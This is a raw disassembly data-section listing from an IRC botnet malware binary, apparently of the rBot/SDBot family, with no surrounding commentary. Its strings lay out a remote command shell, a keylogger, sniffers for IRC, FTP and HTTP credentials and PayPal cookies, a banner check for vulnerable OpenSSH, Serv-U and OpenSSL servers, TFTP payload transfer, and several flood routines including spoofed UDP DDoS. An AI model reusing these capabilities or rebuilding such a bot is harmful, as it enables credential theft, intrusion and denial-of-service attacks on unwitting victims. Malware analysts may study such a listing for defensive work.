'<HEAD>',0Dh,0Ah db '<TITLE>Index of %s</TITLE>',0Dh,0Ah db '</HEAD>',0Dh,0Ah db '<BODY>',0Dh,0Ah,0 align 10h aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_40F96B+4Bo aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_4100DC+8Fo db 'Referer: %s',0Ah db 'Host: %s',0Ah db 'Connection: close',0Ah db 0Ah,0 dword_434648 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_4101FD+171o aServerFailed_0 db '- server failed, returned %d',0 align 4 aUseridUnixS db ' : USERID : UNIX : %s',0Dh,0Ah,0 ; DATA XREF: sub_4101FD+116o dword_43468C dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_4101FD+BBo aClientConnecti db '- client connection from %s:%d.',0 unk_4346B8 db 2Dh ; - ; DATA XREF: sub_4103AB+15Eo db 3, 34h, 2 db 72h ; r db 65h, 64h, 69h db 72h ; r db 65h, 63h, 74h db 2 db 3, 2Dh, 20h aFailedToSta_38 db 'Failed to start client thread, error: <%d>.',0 unk_4346F4 db 2Dh ; - ; DATA XREF: sub_4103AB+E9o db 3, 34h, 2 db 72h ; r db 65h, 64h, 69h db 72h ; r db 65h, 63h, 74h db 2 db 3, 2Dh, 20h aClientConnec_0 db 'Client connection from IP: %s:%d, Server thread: %d.',0 align 4 unk_43473C db 2Dh ; - ; DATA XREF: sub_41053C+1AAo db 3, 34h, 2 db 72h ; r db 65h, 64h, 69h db 72h ; r db 65h, 63h, 74h db 3 db 2, 2Dh, 20h aFailedToSta_39 db 'Failed to start connection thread, error: <%d>.',0 unk_43477C db 2Dh ; - ; DATA XREF: sub_41053C+E1o db 3, 34h, 2 db 72h ; r db 65h, 64h, 69h db 72h ; r db 65h, 63h, 74h db 3 db 2, 2Dh, 20h aClientConnec_1 db 'Client connection to IP: %s:%d, Server thread: %d.',0 align 10h unk_4347C0 db 2Dh ; - ; DATA XREF: sub_4107C0+1E9o db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aUserLoggedOutS db '- User logged out: <%s@%s>.',0 align 4 unk_4347EC db 2Dh ; - ; DATA XREF: sub_4107C0+1C2o db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aErrorSessionru db '- Error: SessionRun(): <%d>.',0 align 4 unk_434818 db 2Dh ; - ; DATA XREF: sub_4107C0+1A2o db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aUserLoggedInS@ db '- User logged in: <%s@%s>.',0 aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_4107C0+172o align 4 unk_434854 db 2Dh ; - ; DATA XREF: sub_4107C0+E1o db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aErrorGetpeerna db '- Error: getpeername(): <%d>.',0 align 10h unk_434880 db 2Dh ; - ; DATA XREF: sub_4109C5:loc_410A0Ao db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aProtocolString db '- Protocol string too long.',0 align 4 unk_4348AC db 2Dh ; - ; DATA XREF: sub_410A1F+1Bo db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aLoginRejectedR db '- Login rejected, Remote user: <%s@%s>.',0 align 4 unk_4348E4 db 2Dh ; - ; DATA XREF: sub_410A4E+219o db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aErrorServerFai db '- Error: server failed, returned: <%d>.',0 align 4 unk_43491C db 2Dh ; - ; DATA XREF: sub_410A4E+1FBo db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aFailedToSta_40 db '- Failed to start client thread, error: <%d>.',0 align 4 unk_434958 db 2Dh ; - ; DATA XREF: sub_410A4E+177o db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aClientConnec_2 db '- Client connection from IP: %s:%d, Server thread: %d.',0 unk_43499C db 2Dh ; - ; DATA XREF: sub_410A4E+106o db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aReadyAndWaitin db '- Ready and waiting for incoming connections.',0 align 4 unk_4349D8 db 2Dh ; - ; DATA XREF: sub_410A4E+70o db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aFailedToInstal db '- Failed to install control-C handler, error: <%d>.',0 align 4 unk_434A1C db 2Dh ; - ; DATA XREF: sub_410A4E+3Do db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aErrorWsastartu db '- Error: WSAStartup(): <%d>.',0 align 4 unk_434A48 db 2Dh ; - ; DATA XREF: sub_410CD6+DEo db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aWaitformultipl db '- WaitForMultipleObjects error: <%d>.',0 align 4 unk_434A7C db 2Dh ; - ; DATA XREF: sub_410CD6+59o ; sub_410CD6+8Bo db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aFailedToCreate db '- Failed to create ReadShell session thread, error: <%d>.',0 align 4 unk_434AC4 db 2Dh ; - ; DATA XREF: sub_410E27+AFo db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aFailedToExecut db '- Failed to execute shell.',0 unk_434AEC db 2Dh ; - ; DATA XREF: sub_410E27+7Eo db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aFailedToCrea_0 db '- Failed to create shell stdin pipe, error: <%d>.',0 align 4 unk_434B2C db 2Dh ; - ; DATA XREF: sub_410E27+5Co db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aFailedToCrea_1 db '- Failed to create shell stdout pipe, error: <%d>.',0 unk_434B6C db 2Dh ; - ; DATA XREF: sub_410F20+C3o db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aFailedToExec_0 db '- Failed to execute shell, error: <%d>.',0 align 4 aCmdQ db 'cmd /q',0 ; DATA XREF: sub_410F20+8Co align 4 unk_434BAC db 2Dh ; - ; DATA XREF: sub_410FF9+A1o db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aSessionreadshe db '- SessionReadShellThread exited, error: <%ld>.',0 dword_434BE8 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4111CE+1B2o aFailedToSta_41 db '- Failed to start server on Port %d.',0 align 4 dword_434C1C dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4111CE+18Fo aFailedToSta_42 db '- Failed to start client thread, error: <%d>.',0 align 4 dword_434C58 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4111CE+114o aClientConnec_3 db '- Client connection from IP: %s:%d, Server thread: %d.',0 align 4 dword_434C9C dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4113D3+1F9o aErrorFailedToC db '- Error: Failed to connect to target, returned: <%d>.',0 align 10h dword_434CE0 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4113D3+18Ao aErrorFailedToO db '- Error: Failed to open socket(), returned: <%d>.',0 align 10h dword_434D20 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4113D3+F2o aAuthentication db '- Authentication failed. Remote userid: %s != %s.',0 align 10h dword_434D60 dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_411797+41Co aTftpTransferCo db 'Tftp transfer complete to: %s',0 ; DATA XREF: sub_411797+3C4o align 4 aTftpTransferSt db 'Tftp transfer started to: %s',0 ; DATA XREF: sub_411797+2CDo align 10h dw 8 unicode 0, <>,0 aB: ; DATA XREF: sub_411CF5:loc_411DD8o unicode 0, <b>,0 dd 62000000h, 2 dup(0) dd 0Dh, 65h, 65000000h, 2 dup(0) dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0 dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0 dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0 dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0 dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0 dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0 dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0 dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0 dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0 dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0 dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0 dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0 dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0 dd 0C0h, 60h, 7E000000h, 2 dup(0) dd 2 dup(31h), 21000000h, 2 dup(0) dd 2 dup(32h), 40000000h, 2 dup(0) dd 2 dup(33h), 23000000h, 2 dup(0) dd 2 dup(34h), 24000000h, 2 dup(0) dd 2 dup(35h), 25000000h, 2 dup(0) dd 2 dup(36h), 5E000000h, 2 dup(0) dd 2 dup(37h), 26000000h, 2 dup(0) dd 2 dup(38h), 2A000000h, 2 dup(0) dd 2 dup(39h), 28000000h, 2 dup(0) dd 2 dup(30h), 29000000h, 2 dup(0) dd 0BDh, 2Dh, 5F000000h, 2 dup(0) dd 0BBh, 3Dh, 2B000000h, 2 dup(0) dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0 dd 51h, 71h, 51000000h, 2 dup(0) dd 57h, 77h, 57000000h, 2 dup(0) dd 45h, 65h, 45000000h, 2 dup(0) dd 52h, 72h, 52000000h, 2 dup(0) dd 54h, 74h, 54000000h, 2 dup(0) dd 59h, 79h, 59000000h, 2 dup(0) dd 55h, 75h, 55000000h, 2 dup(0) dd 49h, 69h, 49000000h, 2 dup(0) dd 4Fh, 6Fh, 4F000000h, 2 dup(0) dd 50h, 70h, 50000000h, 2 dup(0) dd 0DBh, 5Bh, 7B000000h, 2 dup(0) dd 0DDh, 0 dd 7D000000h, 2 dup(0) dd 41h, 61h, 61000000h, 2 dup(0) dd 53h, 73h, 53000000h, 2 dup(0) dd 44h, 64h, 44000000h, 2 dup(0) dd 46h, 66h, 46000000h, 2 dup(0) dd 47h, 67h, 47000000h, 2 dup(0) dd 48h, 68h, 48000000h, 2 dup(0) dd 4Ah, 6Ah, 4A000000h, 2 dup(0) dd 4Bh, 6Bh, 4B000000h, 2 dup(0) dd 4Ch, 6Ch, 4C000000h, 2 dup(0) dd 0BAh, 3Bh, 3A000000h, 2 dup(0) dd 0DEh, 27h, 22000000h, 2 dup(0) dd 5Ah, 7Ah, 5A000000h, 2 dup(0) dd 58h, 78h, 58000000h, 2 dup(0) dd 43h, 63h, 43000000h, 2 dup(0) dd 56h, 76h, 56000000h, 2 dup(0) dd 42h, 62h, 42000000h, 2 dup(0) dd 4Eh, 6Eh, 4E000000h, 2 dup(0) dword_435238 dd 4Dh, 6Dh, 4D000000h, 2 dup(0) dd 0BCh, 2Ch, 3C000000h, 2 dup(0) dd 0BEh, 2Eh, 3E000000h, 2 dup(0) dd 0BFh, 2Fh, 2E000000h, 3Fh, 0 dd 0DCh, 5Ch, 7C000000h, 2 dup(0) dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh dd 5B00005Dh, 5D4E4957h, 0 dd 2 dup(20h), 20000000h, 2 dup(0) dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0 dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh dd 5D534E49h, 0 dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh dd 5D4C4544h, 0 dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0 dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h dd 5D5055h, 0 dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0) dd 6Ah, 2Ah, 2A000000h, 2 dup(0) dd 6Dh, 2Dh, 2D000000h, 2 dup(0) dd 6Bh, 2Bh, 2B000000h, 2 dup(0) dd 60h, 30h, 30000000h, 2 dup(0) dd 61h, 31h, 31000000h, 2 dup(0) dd 62h, 32h, 32000000h, 2 dup(0) dd 63h, 33h, 33000000h, 2 dup(0) dd 64h, 34h, 34000000h, 2 dup(0) dd 65h, 35h, 35000000h, 2 dup(0) dd 66h, 36h, 36000000h, 2 dup(0) dd 67h, 37h, 37000000h, 2 dup(0) dd 68h dword_4354E4 dd 38h, 38000000h, 2 dup(0) ; DATA XREF: sub_411CF5+2B6o dd 69h, 39h, 39000000h, 2 dup(0) dd 6Eh, 2Eh, 2E000000h, 2 dup(0) dword_43551C dd 234032Dh, 6C79656Bh, 302676Fh, 7325202Dh, 0 ; DATA XREF: sub_411C14+AEo aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_411C14+88o align 4 asc_43554C: ; DATA XREF: sub_411C14+2Co unicode 0, <\>,0 aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_411CF5+228o align 4 aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_411CF5+1E5o align 4 aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_411CF5+8Fo align 4 off_435598 dd offset dword_435E10 ; DATA XREF: sub_411FD6+2B9r dd offset off_435E0C dd offset aFtp ; "FTP" dd offset aHttp_0 ; "HTTP" dword_4355A8 dd 6F6C2E3Ah, 6E6967h, 3 dup(0) ; DATA XREF: sub_411FD6+1DEo dword_4355BC dd 0 ; DATA XREF: sub_411FD6+2B2r dd 6F6C2C3Ah, 6E6967h, 4 dup(0) dd 6F6C213Ah, 6E6967h, 4 dup(0) dd 6F6C403Ah, 6E6967h, 4 dup(0) dd 6F6C243Ah, 6E6967h, 4 dup(0) dd 6F6C253Ah, 6E6967h, 4 dup(0) dd 6F6C5E3Ah, 6E6967h, 4 dup(0) dd 6F6C263Ah, 6E6967h, 4 dup(0) dd 6F6C2A3Ah, 6E6967h, 4 dup(0) dd 6F6C2D3Ah, 6E6967h, 4 dup(0) dd 6F6C2B3Ah, 6E6967h, 4 dup(0) dd 6F6C2F3Ah, 6E6967h, 4 dup(0) dd 6F6C5C3Ah, 6E6967h, 4 dup(0) dd 6F6C3D3Ah, 6E6967h, 4 dup(0) dd 6F6C3F3Ah, 6E6967h, 4 dup(0) dd 6F6C273Ah, 6E6967h, 4 dup(0) dd 6F6C603Ah, 6E6967h, 4 dup(0) dd 6F6C7E3Ah, 6E6967h, 4 dup(0) dd 6F6C203Ah, 6E6967h, 4 dup(0) dd 75612E3Ah, 6874h, 4 dup(0) dd 75612C3Ah, 6874h, 4 dup(0) dd 7561213Ah, 6874h, 4 dup(0) dd 7561403Ah, 6874h, 4 dup(0) dd 7561243Ah, 6874h, 4 dup(0) dd 7561253Ah, 6874h, 4 dup(0) dd 75615E3Ah, 6874h, 4 dup(0) dd 7561263Ah, 6874h, 4 dup(0) dd 75612A3Ah, 6874h, 4 dup(0) dd 75612D3Ah, 6874h, 4 dup(0) dd 75612B3Ah, 6874h, 4 dup(0) dd 75612F3Ah, 6874h, 4 dup(0) dd 75615C3Ah, 6874h, 4 dup(0) dd 75613D3Ah, 6874h, 4 dup(0) dd 75613F3Ah, 6874h, 4 dup(0) dd 7561273Ah, 6874h, 4 dup(0) dd 7561603Ah, 6874h, 4 dup(0) dd 75617E3Ah, 6874h, 4 dup(0) dd 7561203Ah, 6874h, 4 dup(0) dd 64692E3Ah, 5 dup(0) dd 64692C3Ah, 5 dup(0) dd 6469213Ah, 5 dup(0) dd 6469403Ah, 5 dup(0) dd 6469243Ah, 5 dup(0) dd 6469253Ah, 5 dup(0) dd 64695E3Ah, 5 dup(0) dd 6469263Ah, 5 dup(0) dd 64692A3Ah, 5 dup(0) dd 64692D3Ah, 5 dup(0) dd 64692B3Ah, 5 dup(0) dd 64692F3Ah, 5 dup(0) dd 64695C3Ah, 5 dup(0) dd 64693D3Ah, 5 dup(0) dd 64693F3Ah, 5 dup(0) dd 6469273Ah, 5 dup(0) dd 6469603Ah, 5 dup(0) dd 64697E3Ah, 5 dup(0) dd 6469203Ah, 5 dup(0) dd 61682E3Ah, 6E696873h, 4 dup(0) dd 6168213Ah, 6E696873h, 4 dup(0) dd 6168243Ah, 6E696873h, 4 dup(0) dd 6168253Ah, 6E696873h, 4 dup(0) dd 65732E3Ah, 65727563h, 4 dup(0) dd 6573213Ah, 65727563h, 4 dup(0) dd 6C2E3Ah, 5 dup(0) dd 6C213Ah, 5 dup(0) dd 6C243Ah, 5 dup(0) dd 6C253Ah, 5 dup(0) dd 782E3Ah, 5 dup(0) dd 78213Ah, 5 dup(0) dd 78243Ah, 5 dup(0) dd 78253Ah, 5 dup(0) dd 79732E3Ah, 6Eh, 4 dup(0) dd 7973213Ah, 6Eh, 4 dup(0) dd 7973243Ah, 6Eh, 4 dup(0) dd 7973253Ah, 6Eh, 4 dup(0) dd 4B444320h, 207965h, 4 dup(0) dd 4E494F4Ah, 2320h, 3 dup(0) dd 1, 4B43494Eh, 20h, 3 dup(0) dd 1, 5245504Fh, 20h, 3 dup(0) dd 1, 7265706Fh, 20h, 3 dup(0) dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h dd 1, 52455355h, 20h, 3 dup(0) dd 2, 53534150h, 20h, 3 dup(0) dd 2, 70796170h, 6C61h, 3 dup(0) dd 3, 50594150h, 4C41h, 3 dup(0) dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0) dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0) dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0) dd 3, 6 dup(0) aHttp_0 db 'HTTP',0 ; DATA XREF: UPX0:004355A4o align 4 aFtp db 'FTP',0 ; DATA XREF: UPX0:004355A0o off_435E0C dd offset dword_435238+11h ; DATA XREF: UPX0:0043559Co dword_435E10 dd 544F42h ; DATA XREF: UPX0:off_435598o dword_435E14 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_411FD6+317o aRecvFailedRetu db '- recv() failed, returned %d',0 align 10h dword_435E40 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_411FD6+2C6o aSuspiciousSPac db '- suspicious %s packet from: %s:%d - %s',0 dword_435E74 dd 234032Dh, 696E7370h, 3026666h, 2Dh ; DATA XREF: sub_411FD6+24Co dword_435E84 dd 4E53505Bh, 5D464649h, 0 ; DATA XREF: sub_411FD6+235o dword_435E90 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_411FD6+186o aWsaioctlFailed db '- WSAIoctl() failed, returned %d',0 align 10h dword_435EC0 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_411FD6+103o aBindFailedRetu db '- bind() failed, returned %d',0 align 4 dword_435EEC dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_411FD6+85o aSocketFailedRe db '- socket() failed, returned %d',0 align 4 aHashin db ':!hashin',0 ; DATA XREF: sub_412361+103o align 4 a_hashin db ':.hashin',0 ; DATA XREF: sub_412361+EEo align 10h aIdent_0 db ':!ident',0 ; DATA XREF: sub_412361+D9o a_ident db ':.ident',0 ; DATA XREF: sub_412361+C8o a_login db ':.Login',0 ; DATA XREF: sub_412361+B7o aLogin_0 db ':!Login',0 ; DATA XREF: sub_412361+A6o aLogin_1 db ':!login',0 ; DATA XREF: sub_412361+95o a_login_0 db ':.login',0 ; DATA XREF: sub_412361+84o a366 db '366 ',0 ; DATA XREF: sub_412361+73o align 4 a302_0 db '302 ',0 ; DATA XREF: sub_412361:loc_4123C3o align 10h aJoin_0 db 'JOIN #',0 ; DATA XREF: sub_412361+4Do align 4 aPsniff_0 db 'PSNIFF//',0 ; DATA XREF: sub_412361+3Co align 4 aPsniff_1 db '[PSNIFF]:',0 ; DATA XREF: sub_412361+2Bo align 10h aBotSniff db 'Bot sniff',0 ; DATA XREF: sub_412361+5o align 4 aYouAreNowAnIrc db 'You are now an IRC Operator',0 ; DATA XREF: sub_412478+62o aOper db 'oper ',0 ; DATA XREF: sub_412478+51o align 10h aNick_1 db 'NICK ',0 ; DATA XREF: sub_412478:loc_4124B8o ; sub_4124EE+2Bo align 4 aOper_0 db 'OPER ',0 ; DATA XREF: sub_412478+2Bo align 10h aIrcSniff db 'IRC sniff',0 ; DATA XREF: sub_412478+5o align 4 aPass_1 db 'PASS ',0 ; DATA XREF: sub_4124EE+73o align 4 aUser_3 db 'USER ',0 ; DATA XREF: sub_4124EE+62o align 4 a230 db '230 ',0 ; DATA XREF: sub_4124EE:loc_41253Fo align 4 a220 db '220 ',0 ; DATA XREF: sub_4124EE+3Co align 4 aFtpSniff db 'FTP sniff',0 ; DATA XREF: sub_4124EE+5o align 4 aSetCookie db 'Set-Cookie:',0 ; DATA XREF: sub_412575+73o aPaypal_com db 'paypal.com',0 ; DATA XREF: sub_412575+62o align 10h aPaypal_com_0 db 'PAYPAL.COM',0 ; DATA XREF: sub_412575+51o align 4 aPaypal_0 db 'PAYPAL',0 ; DATA XREF: sub_412575:loc_4125B5o align 4 aPaypal db 'paypal',0 ; DATA XREF: sub_412575+2Bo align 4 aHttpSniff db 'HTTP sniff',0 ; DATA XREF: sub_412575+5o align 4 aOpenssh_2 db 'OpenSSH_2',0 ; DATA XREF: sub_4125FC+51o align 4 aServUFtpServer db 'Serv-U FTP Server',0 ; DATA XREF: sub_4125FC:loc_41263Co align 4 aOpenssl0_9_6 db 'OpenSSL/0.9.6',0 ; DATA XREF: sub_4125FC+2Bo align 4 aVulnSniff db 'VULN sniff',0 ; DATA XREF: sub_4125FC+5o align 4 unk_436084 db 2Dh ; - ; DATA XREF: sub_412661+3ECo db 3, 34h, 2 db 73h ; s db 6Eh, 69h, 66h db 66h ; f db 65h, 72h, 2 db 3 aVulnSniffSDToS db '- VULN sniff "%s:%d" to "%s:%d": - "%s"',0 align 4 unk_4360BC db 2Dh ; - ; DATA XREF: sub_412661+382o db 3, 34h, 2 db 73h ; s db 6Eh, 69h, 66h db 66h ; f db 65h, 72h, 2 db 3 aHttpSniffSDToS db '- HTTP sniff "%s:%d" to "%s:%d": - "%s"',0 align 4 unk_4360F4 db 2Dh ; - ; DATA XREF: sub_412661+351o db 3, 34h, 2 db 73h ; s db 6Eh, 69h, 66h db 66h ; f db 65h, 72h, 2 db 3 aFtpSniffSDToSD db '- FTP sniff "%s:%d" to "%s:%d": - "%s"',0 unk_436128 db 2Dh ; - ; DATA XREF: sub_412661+31Bo db 3, 34h, 2 db 73h ; s db 6Eh, 69h, 66h db 66h ; f db 65h, 72h, 2 db 3 aIrcSniffSDToSD db '- IRC sniff "%s:%d" to "%s:%d": - "%s"',0 unk_43615C db 2Dh ; - ; DATA XREF: sub_412661+2E2o db 3, 34h, 2 db 73h ; s db 6Eh, 69h, 66h db 66h ; f db 65h, 72h, 2 db 3 aBotSniffSDToSD db '- Bot sniff "%s:%d" to "%s:%d": - "%s"',0 unk_436190 db 2Dh ; - ; DATA XREF: sub_412661+14Bo db 3, 34h, 2 db 73h ; s db 6Eh, 69h, 66h db 66h ; f db 65h, 72h, 2 db 3 aWsaioctlFail_0 db '- WSAIoctl() failed, returned %d',0 align 10h unk_4361C0 db 2Dh ; - ; DATA XREF: sub_412661+C5o db 3, 34h, 2 db 73h ; s db 6Eh, 69h, 66h db 66h ; f db 65h, 72h, 2 db 3 aBindFailedRe_0 db '- bind() failed, returned %d',0 align 4 unk_4361EC db 2Dh ; - ; DATA XREF: sub_412A54+5Eo db 3, 34h, 2 db 64h ; d db 64h, 6Fh, 73h db 2 db 3, 2Dh, 20h aDoneWithFloodA db 'done with flood at %iKB/sec',0 dword_436214 dd 234032Dh, 736F6464h, 202D0302h, 646E6573h, 72726520h ; DATA XREF: sub_412B09+302o dd 203A726Fh, 6425h unk_436230 db 2Dh ; - ; DATA XREF: sub_412E9E+397o db 3, 34h, 2 db 69h ; i db 63h, 6Dh, 70h db 2 db 3, 2Dh, 20h aDoneWithSFlood db 'done with %s flood to %s. sent %d packets @ %dKB/sec (%dMB).',0 align 4 unk_43627C db 2Dh ; - ; DATA XREF: sub_412E9E+307o db 3, 34h, 2 db 69h ; i db 63h, 6Dh, 70h db 2 db 3, 2Dh, 20h aErrorSendingPa db 'error sending packets to %s. %d packets sent, returned %d',0 align 4 unk_4362C4 db 2Dh ; - ; DATA XREF: sub_412E9E+12Ao db 3, 34h, 2 db 69h ; i db 63h, 6Dh, 70h db 2 db 3, 2Dh, 20h aInvalidTargetI db 'invalid target ip',0 align 4 unk_4362E4 db 2Dh ; - ; DATA XREF: sub_412E9E+C2o db 3, 34h, 2 db 69h ; i db 63h, 6Dh, 70h db 2 db 3, 2Dh, 20h aSetsockoptFail db 'setsockopt() failed, returned %d',0 align 4 unk_436314 db 2Dh ; - ; DATA XREF: sub_412E9E+49o db 3, 34h, 2 db 69h ; i db 63h, 6Dh, 70h db 2 db 3, 2Dh, 20h aSocketFailed_0 db 'socket() failed, returned %d',0 align 10h unk_436340 db 2Dh ; - ; DATA XREF: sub_413285+13Co db 3, 34h, 2 db 70h ; p db 69h, 6Eh, 67h db 2 db 3, 2Dh, 20h aFinishedSendin db 'finished sending pings to %s',0 align 4 unk_43636C db 2Dh ; - ; DATA XREF: sub_413285+6Eo db 3, 34h, 2 db 70h ; p db 69h, 6Eh, 67h db 2 db 3, 2Dh, 20h aErrorSendingPi db 'error sending pings to %s',0 align 4 unk_436394 db 2Dh ; - ; DATA XREF: sub_413411+1C6o db 3, 34h, 2 db 75h ; u db 64h, 70h, 2 db 3 aFinishedSend_0 db '- finished sending packets to %s',0 align 10h unk_4363C0 db 2Dh ; - ; DATA XREF: sub_413411+8Eo db 3, 34h, 2 db 75h ; u db 64h, 70h, 2 db 3 aErrorSending_0 db '- error sending packets to %s',0 align 4 dword_4363E8 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_413627+4Bo aDoneWithFloodI db '- Done with flood (%iKB/sec)',0 align 4 unk_436414 db 2Dh ; - ; DATA XREF: sub_4137CD+4Bo db 3, 34h, 2 db 73h ; s db 79h, 6Eh, 2 db 3 aDoneWithFloo_0 db '- Done with flood (%iKB/sec).',0 align 4 unk_43643C db 2Dh ; - ; DATA XREF: sub_41386C+27Do db 3, 34h, 2 db 73h ; s db 79h, 6Eh, 2 db 3 aSendErrorD_ db '- Send error: <%d>.',0 align 4 dword_43645C dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_413B78+4Fo aDoneWithFlood_ db '- Done with flood.',0 align 4 unk_43647C db 2Dh ; - ; DATA XREF: sub_413E36+4EBo db 3, 34h, 2 db 74h ; t db 63h, 70h, 2 db 3 aDoneWithSFlo_0 db '- Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d' db 'MB).',0 align 4 unk_4364CC db 2Dh ; - ; DATA XREF: sub_413E36+44Fo db 3, 34h, 2 db 74h ; t db 63h, 70h, 2 db 3 aErrorSending_1 db '- Error sending packets to IP: %s. Packets sent: %d. Returned: <%' db 'd>.',0 align 4 unk_43651C db 2Dh ; - ; DATA XREF: sub_413E36+15Fo db 3, 34h, 2 db 74h ; t db 63h, 70h, 2 db 3 aInvalidTarge_0 db '- Invalid target IP.',0 align 4 unk_43653C db 2Dh ; - ; DATA XREF: sub_413E36+EEo db 3, 34h, 2 db 74h ; t db 63h, 70h, 2 db 3 aErrorSetsockop db '- Error: setsockopt() failed, returned: <%d>.',0 align 4 unk_436574 db 2Dh ; - ; DATA XREF: sub_413E36+70o db 3, 34h, 2 db 74h ; t db 63h, 70h, 2 db 3 aErrorSocketFai db '- Error: socket() failed, returned: <%d>.',0 align 4 unk_4365A8 db 2Dh ; - ; DATA XREF: sub_4143CC+66o db 3, 34h, 2 db 74h ; t db 73h, 75h, 6Eh db 61h ; a db 6Dh, 69h, 2 db 3 aDoneWithFloodD db '- Done with flood, %d packets sent.',0 align 4 unk_4365DC db 2Dh ; - ; DATA XREF: sub_4146CF+4Do db 3, 34h, 2 db 77h ; w db 69h, 73h, 64h db 6Fh ; o db 6Dh, 28h, 75h db 64h ; d db 70h, 29h, 2 db 3 aStartingWisdom db '- Starting Wisdom spoofed UDP flood thread.',0 align 4 unk_43661C db 2Dh ; - ; DATA XREF: sub_414746+345o db 3, 34h, 2 db 77h ; w db 69h, 73h, 64h db 6Fh ; o db 6Dh, 28h, 75h db 64h 